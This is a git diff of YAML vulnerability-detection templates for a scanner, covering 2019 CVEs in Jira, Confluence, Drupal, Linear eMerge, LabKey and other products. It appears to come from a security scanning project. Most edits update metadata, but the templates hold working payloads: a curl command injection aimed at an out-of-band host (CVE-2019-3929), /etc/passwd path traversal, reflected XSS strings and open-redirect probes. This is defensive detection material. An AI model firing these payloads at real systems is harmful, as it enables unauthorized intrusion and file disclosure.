     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
     cvss-score: 7.2
     cve-id: CVE-2019-2767
-  tags: cve,cve2019,oracle,xxe,oast
+  tags: edb,cve,cve2019,oracle,xxe,oast
 
 requests:
   - raw:
@@ -26,3 +26,5 @@ requests:
         part: interactsh_protocol  # Confirms the HTTP Interaction
         words:
           - "http"
+
+# Enhanced by mp on 2022/07/08
diff --git a/cves/2019/CVE-2019-3396.yaml b/cves/2019/CVE-2019-3396.yaml
index ac32801dfd..cda743ac16 100644
--- a/cves/2019/CVE-2019-3396.yaml
+++ b/cves/2019/CVE-2019-3396.yaml
@@ -8,6 +8,8 @@ info:
   reference:
     - https://github.com/x-f1v3/CVE-2019-3396
     - https://nvd.nist.gov/vuln/detail/CVE-2019-3396
+    - https://jira.atlassian.com/browse/CONFSERVER-57974
+    - http://packetstormsecurity.com/files/152568/Atlassian-Confluence-Widget-Connector-Macro-Velocity-Template-Injection.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -15,7 +17,7 @@ info:
     cwe-id: CWE-22
   metadata:
     shodan-query: http.component:"Atlassian Confluence"
-  tags: cve,cve2019,atlassian,confluence,lfi,rce
+  tags: cve,cve2019,atlassian,confluence,lfi,rce,kev,packetstorm
 
 requests:
   - raw:
diff --git a/cves/2019/CVE-2019-3401.yaml b/cves/2019/CVE-2019-3401.yaml
index 0b550acd90..ebc14fcf44 100644
--- a/cves/2019/CVE-2019-3401.yaml
+++ b/cves/2019/CVE-2019-3401.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://jira.atlassian.com/browse/JRASERVER-69244
   classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
     cve-id: CVE-2019-3401
-    cwe-id: CWE-200
+    cwe-id: CWE-863
+  metadata:
+    shodan-query: http.component:"Atlassian Jira"
   tags: cve,cve2019,jira,atlassian,exposure
 
 requests:
diff --git a/cves/2019/CVE-2019-3402.yaml b/cves/2019/CVE-2019-3402.yaml
index dace4070e7..9624e09c44 100644
--- a/cves/2019/CVE-2019-3402.yaml
+++ b/cves/2019/CVE-2019-3402.yaml
@@ -1,18 +1,21 @@
 id: CVE-2019-3402
 
 info:
-  name: Jira - Reflected XSS using searchOwnerUserName parameter.
+  name: Jira <8.1.1 - Cross-Site Scripting
   author: pdteam
   severity: medium
-  description: The ConfigurePortalPages.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting
-    (XSS) vulnerability in the searchOwnerUserName parameter.
+  description: Jira before 8.1.1 contains a cross-site scripting vulnerability via ConfigurePortalPages.jspa resource in the searchOwnerUserName parameter.
   reference:
     - https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c
+    - https://jira.atlassian.com/browse/JRASERVER-69243
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-3402
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2019-3402
     cwe-id: CWE-79
+  metadata:
+    shodan-query: http.component:"Atlassian Jira"
   tags: cve,cve2019,atlassian,jira,xss
 
 requests:
@@ -28,4 +31,6 @@ requests:
       - type: word
         words:
           - "<script>alert(1)</script>"
-        part: body
\ No newline at end of file
+        part: body
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2019/CVE-2019-3403.yaml b/cves/2019/CVE-2019-3403.yaml
index 36e42e13dd..e5c5fe7c5c 100644
--- a/cves/2019/CVE-2019-3403.yaml
+++ b/cves/2019/CVE-2019-3403.yaml
@@ -13,6 +13,8 @@ info:
     cvss-score: 5.3
     cve-id: CVE-2019-3403
     cwe-id: CWE-863
+  metadata:
+    shodan-query: http.component:"Atlassian Jira"
   tags: cve,cve2019,atlassian,jira
 
 requests:
diff --git a/cves/2019/CVE-2019-3799.yaml b/cves/2019/CVE-2019-3799.yaml
index d433ecb90a..a7ec533c28 100644
--- a/cves/2019/CVE-2019-3799.yaml
+++ b/cves/2019/CVE-2019-3799.yaml
@@ -1,14 +1,15 @@
 id: CVE-2019-3799
 
 info:
-  name: Spring-Cloud-Config-Server Directory Traversal
+  name: Spring Cloud Config Server - Local File Inclusion
   author: madrobot
   severity: medium
-  description: Spring Cloud Config, versions 2.1.x prior to 2.1.2, versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6, and older unsupported versions allow applications to serve arbitrary configuration
-    files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead a directory traversal attack.
+  description: Spring Cloud Config Server versions 2.1.x prior to 2.1.2, 2.0.x prior to 2.0.4, 1.4.x prior to 1.4.6, and older unsupported versions are vulnerable to local file inclusion because they allow applications to serve arbitrary configuration files. An attacker can send a request using a specially crafted URL that can lead to a directory traversal attack.
   reference:
     - https://github.com/mpgn/CVE-2019-3799
     - https://pivotal.io/security/cve-2019-3799
+    - https://www.oracle.com/security-alerts/cpuapr2022.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-3799
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
     cvss-score: 6.5
@@ -29,3 +30,5 @@ requests:
         regex:
           - 'root:.*:0:0:'
         part: body
+
+# Enhanced by mp on 2022/07/22
diff --git a/cves/2019/CVE-2019-3911.yaml b/cves/2019/CVE-2019-3911.yaml
index ba2a73a676..4a49beede1 100644
--- a/cves/2019/CVE-2019-3911.yaml
+++ b/cves/2019/CVE-2019-3911.yaml
@@ -1,14 +1,13 @@
 id: CVE-2019-3911
 
 info:
-  name: LabKey Server < 18.3.0 - XSS
+  name: LabKey Server Community Edition <18.3.0 - Cross-Site Scripting
   author: princechaddha
   severity: medium
-  description: Reflected cross-site scripting (XSS) vulnerability in LabKey Server Community Edition before 18.3.0-61806.763 allows an unauthenticated remote attacker to inject arbitrary javascript via the onerror
-    parameter in the /__r2/query endpoints.
+  description: LabKey Server Community Edition before 18.3.0-61806.763 contains a reflected cross-site scripting vulnerability via the onerror parameter in the /__r2/query endpoints, which allows an unauthenticated remote attacker to inject arbitrary JavaScript.
   reference:
     - https://www.tenable.com/security/research/tra-2019-03
-    - https://www.cvedetails.com/cve/CVE-2019-3911
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-3911
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -16,7 +15,7 @@ info:
     cwe-id: CWE-79
   metadata:
     shodan-query: 'Server: Labkey'
-  tags: cve,cve2019,xss,labkey
+  tags: cve,cve2019,xss,labkey,tenable
 
 requests:
   - method: GET
@@ -38,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by cs on 2022/09/07
diff --git a/cves/2019/CVE-2019-3912.yaml b/cves/2019/CVE-2019-3912.yaml
index def2a63d29..26ddc2eb9c 100644
--- a/cves/2019/CVE-2019-3912.yaml
+++ b/cves/2019/CVE-2019-3912.yaml
@@ -9,21 +9,21 @@ info:
     - https://www.tenable.com/security/research/tra-2019-03
     - https://www.cvedetails.com/cve/CVE-2019-3912
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2019-3912
     cwe-id: CWE-601
   metadata:
     shodan-query: 'Server: Labkey'
-  tags: cve,cve2019,redirect,labkey
+  tags: tenable,cve,cve2019,redirect,labkey
 
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/labkey/__r1/login-login.view?returnUrl=http://example.com'
+      - '{{BaseURL}}/labkey/__r1/login-login.view?returnUrl=http://interact.sh'
 
     matchers:
       - type: regex
         part: header
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
diff --git a/cves/2019/CVE-2019-3929.yaml b/cves/2019/CVE-2019-3929.yaml
index 75299c84cf..1de3aa3ef9 100644
--- a/cves/2019/CVE-2019-3929.yaml
+++ b/cves/2019/CVE-2019-3929.yaml
@@ -9,19 +9,20 @@ info:
     - http://packetstormsecurity.com/files/152715/Barco-AWIND-OEM-Presentation-Platform-Unauthenticated-Remote-Command-Injection.html
     - https://www.exploit-db.com/exploits/46786/
     - https://nvd.nist.gov/vuln/detail/CVE-2019-3929
+    - https://www.tenable.com/security/research/tra-2019-20
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2019-3929
     cwe-id: CWE-78
-  tags: rce,cve,cve2019,oast,injection
+  tags: tenable,cve,cve2019,oast,injection,kev,edb,rce,packetstorm
 
 requests:
   - method: POST
     path:
       - "{{BaseURL}}/cgi-bin/file_transfer.cgi"
 
-    body: "file_transfer=new&dir=%27Pa_Noteexpr%20curl%2bhttp%3a//{{interactsh-url}}Pa_Note%27"
+    body: "file_transfer=new&dir=%27Pa_Noteexpr%20curl%2b{{interactsh-url}}Pa_Note%27"
     headers:
       Content-Type: application/x-www-form-urlencoded
 
diff --git a/cves/2019/CVE-2019-5418.yaml b/cves/2019/CVE-2019-5418.yaml
index 417739803d..c6bddb1a8c 100644
--- a/cves/2019/CVE-2019-5418.yaml
+++ b/cves/2019/CVE-2019-5418.yaml
@@ -4,17 +4,17 @@ info:
   name: Rails File Content Disclosure
   author: omarkurt
   severity: high
-  description: Rails <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3 are susceptible to a file content disclosure vulnerability because specially crafted accept headers can cause contents of arbitrary files on the
-    target system's file system to be exposed.
+  description: Rails <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3 are susceptible to a file content disclosure vulnerability because specially crafted accept headers can cause contents of arbitrary files on the target system's file system to be exposed.
   reference:
     - https://github.com/omarkurt/CVE-2019-5418
     - https://weblog.rubyonrails.org/2019/3/13/Rails-4-2-5-1-5-1-6-2-have-been-released/
     - https://nvd.nist.gov/vuln/detail/CVE-2019-5418
+    - https://www.exploit-db.com/exploits/46585/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2019-5418
-  tags: cve,cve2019,rails,lfi,disclosure
+  tags: cve,cve2019,rails,lfi,disclosure,edb
 
 requests:
   - method: GET
diff --git a/cves/2019/CVE-2019-6112.yaml b/cves/2019/CVE-2019-6112.yaml
index 4e8ab33741..0c0ecc83ea 100644
--- a/cves/2019/CVE-2019-6112.yaml
+++ b/cves/2019/CVE-2019-6112.yaml
@@ -4,10 +4,11 @@ info:
   name: WordPress Sell Media 2.4.1 - Cross-Site Scripting
   author: dwisiswant0
   severity: medium
-  description: "WordPress Plugin Sell Media v2.4.1 contains a cross-site scripting vulnerability in /inc/class-search.php that allows remote attackers to inject arbitrary web script or HTML via the keyword parameter (aka $search_term or the Search field)."
+  description: WordPress Plugin Sell Media v2.4.1 contains a cross-site scripting vulnerability in /inc/class-search.php that allows remote attackers to inject arbitrary web script or HTML via the keyword parameter (aka $search_term or the Search field).
   reference:
     - https://github.com/graphpaperpress/Sell-Media/commit/8ac8cebf332e0885863d0a25e16b4b180abedc47#diff-f16fea0a0c8cc36031ec339d02a4fb3b
     - https://nvd.nist.gov/vuln/detail/CVE-2019-6112
+    - https://metamorfosec.com/Files/Advisories/METS-2020-001-A_XSS_Vulnerability_in_Sell_Media_Plugin_v2.4.1_for_WordPress.txt
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
diff --git a/cves/2019/CVE-2019-6340.yaml b/cves/2019/CVE-2019-6340.yaml
index c12458d849..094d920c75 100644
--- a/cves/2019/CVE-2019-6340.yaml
+++ b/cves/2019/CVE-2019-6340.yaml
@@ -1,18 +1,23 @@
 id: CVE-2019-6340
 
 info:
-  name: Drupal 8 core RESTful Web Services RCE
+  name: Drupal - Remote Code Execution
   author: madrobot
   severity: high
-  description: Some field types do not properly sanitize data from non-form sources in Drupal 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10. This can lead to arbitrary PHP code execution in some cases.
+  description: Drupal 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10 V contain certain field types that do not properly sanitize data from non-form sources, which can lead to arbitrary PHP code execution in some cases.
   reference:
+    - https://www.drupal.org/sa-core-2019-003
+    - http://web.archive.org/web/20210125004201/https://www.securityfocus.com/bid/107106/
+    - https://www.synology.com/security/advisory/Synology_SA_19_09
     - https://nvd.nist.gov/vuln/detail/CVE-2019-6340
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.1
     cve-id: CVE-2019-6340
     cwe-id: CWE-502
-  tags: cve,cve2019,drupal,rce
+  metadata:
+    shodan-query: http.component:"drupal"
+  tags: cve,cve2019,drupal,rce,kev,cisa
 
 requests:
   - method: POST
@@ -45,3 +50,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/08
diff --git a/cves/2019/CVE-2019-6715.yaml b/cves/2019/CVE-2019-6715.yaml
index bb10c6d96b..2db45b9db1 100644
--- a/cves/2019/CVE-2019-6715.yaml
+++ b/cves/2019/CVE-2019-6715.yaml
@@ -14,7 +14,7 @@ info:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2019-6715
-  tags: cve,cve2019,wordpress,wp-plugin,ssrf
+  tags: cve,cve2019,wordpress,wp-plugin,ssrf,packetstorm
 
 requests:
   - raw:
diff --git a/cves/2019/CVE-2019-7219.yaml b/cves/2019/CVE-2019-7219.yaml
index 1749561ac7..060212e163 100644
--- a/cves/2019/CVE-2019-7219.yaml
+++ b/cves/2019/CVE-2019-7219.yaml
@@ -1,14 +1,16 @@
 id: CVE-2019-7219
 
 info:
-  name: Zarafa WebApp Reflected XSS
+  name: Zarafa WebApp <=2.0.1.47791 - Cross-Site Scripting
   author: pdteam
   severity: medium
   description: |
-    Unauthenticated reflected cross-site scripting (XSS) exists in Zarafa Webapp 2.0.1.47791 and earlier. NOTE: this is a discontinued product. The issue was fixed in later Zarafa Webapp versions; however, some former Zarafa Webapp customers use the related Kopano product instead.
+    Zarafa WebApp 2.0.1.47791 and earlier contains an unauthenticated reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
   reference:
     - https://github.com/verifysecurity/CVE-2019-7219
     - https://stash.kopano.io/repos?visibility=public
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-7219
+  remediation: This is a discontinued product. The issue was fixed in later versions. However, some former Zarafa WebApp customers use the related Kopano product instead.
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -19,19 +21,19 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/webapp/?fccc%27\%22%3E%3Csvg/onload=alert(xss)%3E'
-
+      - '{{BaseURL}}/webapp/?fccc%27\%22%3E%3Csvg/onload=alert(/xss/)%3E'
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - "<svg/onload=alert(xss)>"
+          - "<svg/onload=alert(/xss/)>"
       - type: word
         part: header
         words:
           - "text/html"
-
       - type: status
         status:
-          - 200
\ No newline at end of file
+          - 200
+
+# Enhanced by cs on 2022/09/07
diff --git a/cves/2019/CVE-2019-7238.yaml b/cves/2019/CVE-2019-7238.yaml
index dcc8e406c2..da9ea3d58a 100644
--- a/cves/2019/CVE-2019-7238.yaml
+++ b/cves/2019/CVE-2019-7238.yaml
@@ -13,7 +13,7 @@ info:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2019-7238
-  tags: cve,cve2019,nexus,rce
+  tags: cve,cve2019,nexus,rce,kev
 
 requests:
   - raw:
diff --git a/cves/2019/CVE-2019-7254.yaml b/cves/2019/CVE-2019-7254.yaml
index 88ac0b31b8..84945b5507 100644
--- a/cves/2019/CVE-2019-7254.yaml
+++ b/cves/2019/CVE-2019-7254.yaml
@@ -1,18 +1,22 @@
 id: CVE-2019-7254
 
 info:
-  name: eMerge E3 1.00-06 - Unauthenticated Directory Traversal
+  name: eMerge E3 1.00-06 - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: Linear eMerge E3-Series devices allow File Inclusion.
+  description: Linear eMerge E3-Series devices are vulnerable to local file inclusion.
   reference:
     - https://www.exploit-db.com/exploits/47616
+    - https://applied-risk.com/labs/advisories
+    - https://www.applied-risk.com/resources/ar-2019-005
+    - http://packetstormsecurity.com/files/155252/Linear-eMerge-E3-1.00-06-Directory-Traversal.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-7254
   classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 8.8
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
     cve-id: CVE-2019-7254
     cwe-id: CWE-22
-  tags: cve,cve2019,emerge,lfi
+  tags: emerge,lfi,edb,packetstorm,cve,cve2019
 
 requests:
   - method: GET
@@ -30,3 +34,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/08
diff --git a/cves/2019/CVE-2019-7255.yaml b/cves/2019/CVE-2019-7255.yaml
new file mode 100644
index 0000000000..264bb9e20d
--- /dev/null
+++ b/cves/2019/CVE-2019-7255.yaml
@@ -0,0 +1,45 @@
+id: CVE-2019-7255
+
+info:
+  name: Linear eMerge E3 - Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    Linear eMerge E3-Series devices are vulnerable to cross-site scripting via the 'layout' parameter.
+  reference:
+    - https://www.applied-risk.com/resources/ar-2019-005
+    - https://applied-risk.com/labs/advisories
+    - https://packetstormsecurity.com/files/155253/Linear-eMerge-E3-1.00-06-Cross-Site-Scripting.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-7255
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2019-7255
+    cwe-id: CWE-79
+  metadata:
+    shodan-query: http.title:"eMerge"
+    verified: "true"
+  tags: emerge,xss,packetstorm,cve,cve2019,nortek
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/badging/badge_template_v0.php?layout=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Template : <script>alert(document.domain)</script>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by cs on 2022/09/08
diff --git a/cves/2019/CVE-2019-7256.yaml b/cves/2019/CVE-2019-7256.yaml
index 5f2fb8e608..c7f2312214 100644
--- a/cves/2019/CVE-2019-7256.yaml
+++ b/cves/2019/CVE-2019-7256.yaml
@@ -9,12 +9,13 @@ info:
     - https://www.exploit-db.com/exploits/47619
     - http://linear-solutions.com/nsc_family/e3-series/
     - https://nvd.nist.gov/vuln/detail/CVE-2019-7256
+    - https://applied-risk.com/labs/advisories
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
-    cvss-score: 10.0
+    cvss-score: 10
     cve-id: CVE-2019-7256
     cwe-id: CWE-78
-  tags: cve,cve2019,emerge,rce
+  tags: cve,cve2019,emerge,rce,edb
 
 requests:
   - raw:
diff --git a/cves/2019/CVE-2019-7275.yaml b/cves/2019/CVE-2019-7275.yaml
index d8a4353de2..4f0604520e 100644
--- a/cves/2019/CVE-2019-7275.yaml
+++ b/cves/2019/CVE-2019-7275.yaml
@@ -9,20 +9,21 @@ info:
     - https://packetstormsecurity.com/files/155268/Optergy-Proton-Enterprise-BMS-2.3.0a-Open-Redirect.html
     - https://applied-risk.com/resources/ar-2019-008
     - https://cxsecurity.com/issue/WLB-2019110074
+    - https://applied-risk.com/labs/advisories
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2019-7275
     cwe-id: CWE-601
-  tags: cve,cve2019,redirect
+  tags: cve,cve2019,redirect,packetstorm
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/updating.jsp?url=https://example.com/"
+      - "{{BaseURL}}/updating.jsp?url=https://interact.sh/"
 
     matchers:
       - type: regex
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
         part: header
diff --git a/cves/2019/CVE-2019-7315.yaml b/cves/2019/CVE-2019-7315.yaml
new file mode 100644
index 0000000000..cb43ae8ab9
--- /dev/null
+++ b/cves/2019/CVE-2019-7315.yaml
@@ -0,0 +1,35 @@
+id: CVE-2019-7315
+
+info:
+  name: Genie Access WIP3BVAF IP Camera - Local File Inclusion
+  author: 0x_Akoko
+  severity: high
+  description: Genie Access WIP3BVAF WISH IP 3MP IR Auto Focus Bullet Camera devices through 3.X are vulnerable to local file inclusion via the web interface, as demonstrated by reading /etc/shadow.
+  reference:
+    - https://labs.nettitude.com/blog/cve-2019-7315-genie-access-wip3bvaf-ip-camera-directory-traversal/
+    - https://vuldb.com/?id.136593
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-7315
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2019-7315
+    cwe-id: CWE-22
+  tags: cve,cve2019,camera,genie,lfi,iot
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/../../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/07/08
diff --git a/cves/2019/CVE-2019-7481.yaml b/cves/2019/CVE-2019-7481.yaml
index 871eb7c006..dd5378b07e 100644
--- a/cves/2019/CVE-2019-7481.yaml
+++ b/cves/2019/CVE-2019-7481.yaml
@@ -8,12 +8,13 @@ info:
   reference:
     - https://www.crowdstrike.com/blog/how-ecrime-groups-leverage-sonicwall-vulnerability-cve-2019-7481/
     - https://nvd.nist.gov/vuln/detail/CVE-2019-7481
+    - https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2019-0016
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2019-7481
     cwe-id: CWE-89
-  tags: cve,cve2019,sonicwall,sqli
+  tags: cve,cve2019,sonicwall,sqli,kev
 
 requests:
   - raw:
diff --git a/cves/2019/CVE-2019-7543.yaml b/cves/2019/CVE-2019-7543.yaml
index de81ecf465..949979ecba 100644
--- a/cves/2019/CVE-2019-7543.yaml
+++ b/cves/2019/CVE-2019-7543.yaml
@@ -1,10 +1,10 @@
 id: CVE-2019-7543
 
 info:
-  name: KindEditor 4.1.11, the php/demo.php - (XSS)
+  name: KindEditor 4.1.11 - Cross-Site Scripting
   author: pikpikcu
   severity: medium
-  description: KindEditor 4.1.11, the php/demo.php content1 parameter has a reflected Cross-site Scripting (XSS) vulnerability.
+  description: KindEditor 4.1.11 contains a cross-site scripting vulnerability via the php/demo.php content1 parameter.
   reference:
     - https://github.com/0xUhaw/CVE-Bins/tree/master/KindEditor
     - https://nvd.nist.gov/vuln/detail/CVE-2019-7543
@@ -36,3 +36,5 @@ requests:
         part: header
         words:
           - text/html
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2019/CVE-2019-7609.yaml b/cves/2019/CVE-2019-7609.yaml
index 270f3a4da0..c98174106a 100644
--- a/cves/2019/CVE-2019-7609.yaml
+++ b/cves/2019/CVE-2019-7609.yaml
@@ -9,12 +9,13 @@ info:
     - https://github.com/mpgn/CVE-2019-7609
     - https://discuss.elastic.co/t/elastic-stack-6-6-1-and-5-6-15-security-update/169077
     - https://nvd.nist.gov/vuln/detail/CVE-2019-7609
+    - https://www.elastic.co/community/security
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
-    cvss-score: 10.0
+    cvss-score: 10
     cve-id: CVE-2019-7609
     cwe-id: CWE-94
-  tags: cve,cve2019,kibana,rce
+  tags: cve,cve2019,kibana,rce,kev
 
 requests:
   - method: POST
diff --git a/cves/2019/CVE-2019-8442.yaml b/cves/2019/CVE-2019-8442.yaml
index 58313175d6..808edd8cfa 100644
--- a/cves/2019/CVE-2019-8442.yaml
+++ b/cves/2019/CVE-2019-8442.yaml
@@ -1,17 +1,20 @@
 id: CVE-2019-8442
 
 info:
-  name: JIRA Directory Traversal
+  name: Jira - Local File Inclusion
   author: Kishore Krishna (siLLyDaddy)
   severity: high
-  description: The CachingResourceDownloadRewriteRule class in Jira before version 7.13.4, and from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 allows remote attackers to access
-    files in the Jira webroot under the META-INF directory via a lax path access check.
+  description: Jira before version 7.13.4, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1, allows remote attackers to access files in the Jira webroot under the META-INF directory via local file inclusion.
   reference:
     - https://jira.atlassian.com/browse/JRASERVER-69241
+    - http://web.archive.org/web/20210125215006/https://www.securityfocus.com/bid/108460/
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-8442
   classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2019-8442
+  metadata:
+    shodan-query: http.component:"Atlassian Jira"
   tags: cve,cve2019,atlassian,jira,lfi
 
 requests:
@@ -29,4 +32,6 @@ requests:
       - type: word
         words:
           - '<groupId>com.atlassian.jira</groupId>'
-        part: body
\ No newline at end of file
+        part: body
+
+# Enhanced by mp on 2022/07/08
diff --git a/cves/2019/CVE-2019-8446.yaml b/cves/2019/CVE-2019-8446.yaml
index b91edfd0bc..be81d54b6e 100644
--- a/cves/2019/CVE-2019-8446.yaml
+++ b/cves/2019/CVE-2019-8446.yaml
@@ -13,6 +13,8 @@ info:
     cvss-score: 5.3
     cve-id: CVE-2019-8446
     cwe-id: CWE-863
+  metadata:
+    shodan-query: http.component:"Atlassian Jira"
   tags: cve,cve2019,jira
 
 requests:
diff --git a/cves/2019/CVE-2019-8449.yaml b/cves/2019/CVE-2019-8449.yaml
index c584dd8ef0..162a8a0ff0 100644
--- a/cves/2019/CVE-2019-8449.yaml
+++ b/cves/2019/CVE-2019-8449.yaml
@@ -8,12 +8,15 @@ info:
   reference:
     - https://www.doyler.net/security-not-included/more-jira-enumeration
     - https://jira.atlassian.com/browse/JRASERVER-69796
+    - http://packetstormsecurity.com/files/156172/Jira-8.3.4-Information-Disclosure.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
     cve-id: CVE-2019-8449
     cwe-id: CWE-306
-  tags: cve,cve2019,atlassian,jira,disclosure
+  metadata:
+    shodan-query: http.component:"Atlassian Jira"
+  tags: atlassian,jira,disclosure,packetstorm,cve,cve2019
 
 requests:
   - method: GET
diff --git a/cves/2019/CVE-2019-8451.yaml b/cves/2019/CVE-2019-8451.yaml
index 182c86e698..df4392692a 100644
--- a/cves/2019/CVE-2019-8451.yaml
+++ b/cves/2019/CVE-2019-8451.yaml
@@ -15,7 +15,9 @@ info:
     cvss-score: 6.5
     cve-id: CVE-2019-8451
     cwe-id: CWE-918
-  tags: cve,cve2019,atlassian,jira,ssrf,oast
+  metadata:
+    shodan-query: http.component:"Atlassian Jira"
+  tags: atlassian,jira,ssrf,oast,tenable,hackerone,cve,cve2019
 
 requests:
   - method: POST
diff --git a/cves/2019/CVE-2019-8903.yaml b/cves/2019/CVE-2019-8903.yaml
index 7b40a67c18..55409ed746 100644
--- a/cves/2019/CVE-2019-8903.yaml
+++ b/cves/2019/CVE-2019-8903.yaml
@@ -1,14 +1,15 @@
 id: CVE-2019-8903
 
 info:
-  name: Totaljs - Unauthenticated Directory Traversal
